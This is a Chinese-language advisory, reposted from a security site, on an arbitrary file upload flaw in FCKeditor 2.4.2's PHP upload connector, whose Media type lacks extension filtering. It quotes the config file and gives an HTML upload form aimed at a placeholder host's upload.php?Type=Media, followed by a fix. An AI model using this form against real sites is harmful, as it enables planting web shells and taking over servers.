Fckeditor 2.4.2 php任意上傳檔案漏洞

Fckeditor 2.4.2 php任意上傳檔案漏洞(2)

 

 

問題主要是出在config.php檔案中未對Media目錄作白名單和黑名單的限制，大概是寫漏了，因為在fckeditor/editor/filemanager/browser/default/connectors/php目錄中的config.php檔案對Media是有限制的。
 <?php
/*
* FCKeditor - The text editor for Internet - http://www.fckeditor.net
* Copyright (C) 2003-2007 Frederico Caldeira Knabben
*
* == BEGIN LICENSE ==
*
* Licensed under the terms of any of the following licenses at your
* choice:
*
* - GNU General Public License Version 2 or later (the "GPL")
* http://www.gnu.org/licenses/gpl.html
*
* - GNU Lesser General Public License Version 2.1 or later (the "LGPL")
* http://www.gnu.org/licenses/lgpl.html
*
* - Mozilla Public License Version 1.1 or later (the "MPL")
* http://www.mozilla.org/MPL/MPL-1.1.html
*
* == END LICENSE ==
*
* Configuration file for the File Manager Connector for PHP.
*/
global $Config ;

// SECURITY: You must explicitelly enable this "connector". (Set it to "true").
$Config['Enabled'] = false ;

// Path to user files relative to the document root.
$Config['UserFilesPath'] = '/userfiles/' ;

// Fill the following value it you prefer to specify the absolute path for the
// user files directory. Usefull if you are using a virtual directory, symbolic
// link or alias. Examples: 'C://MySite//userfiles//' or '/root/mysite/userfiles/'.
// Attention: The above 'UserFilesPath' must point to the same directory.
$Config['UserFilesAbsolutePath'] = '' ;

// Due to security issues with Apache modules, it is reccomended to leave the
// following setting enabled.
$Config['ForceSingleExtension'] = true ;

$Config['AllowedExtensions']['File'] = array() ;
$Config['DeniedExtensions']['File'] = array('html','htm','php','php2','php3','php4','php5','phtml','pwml','inc','asp','aspx','ascx','jsp','cfm','cfc','pl','bat','exe','com','dll','vbs','js','reg','cgi','htaccess','asis') ;

$Config['AllowedExtensions']['Image'] = array('jpg','gif','jpeg','png') ;
$Config['DeniedExtensions']['Image'] = array() ;

$Config['AllowedExtensions']['Flash'] = array('swf','fla') ;
$Config['DeniedExtensions']['Flash'] = array() ;

$Config['AllowedExtensions']['Media'] = array('swf','fla','jpg','gif','jpeg','png','avi','mpg','mpeg') ;
$Config['DeniedExtensions']['Media'] = array() ;

?>
 
 

 

 2、漏洞利用
    既然fckeditor/editor/filemanager/browser/default/connectors/php/config.php已經過濾了，那就只能利用fckeditor/editor/filemanager/upload/php/config.php了。
    不過如果留意一下改設定檔，就能看到預設情況下“$Config['Enabled'] = false”，是不允許上傳的；其次，看upload.php能發現，程式對上傳檔案夾作了比對，必須是Media，說明在windows下不影響，但在Linux下則必須是大寫M的Media目錄，如果是media則返回資訊正常，但檔案並未上傳成功。
    自己寫段上傳指令碼：
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxx.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
    提交後查看源碼就能看到上傳檔案的位置。

3、漏洞修補
    最好用新版，要不就拷貝以下代碼到config.php最後。
$Config['AllowedExtensions']['Media'] = array('swf','fla','jpg','gif','jpeg','png','avi','mpg','mpeg') ;
$Config['DeniedExtensions']['Media'] = array() ;

 

標籤分類： 安全性漏洞

本文轉自 ☆★ 黑白前線 ★☆ - www.hackline.net 轉載請註明出處，侵權必究。
原文連結：http://www.hackline.net/a/news/ldfb/web/2009/1013/1005_2.html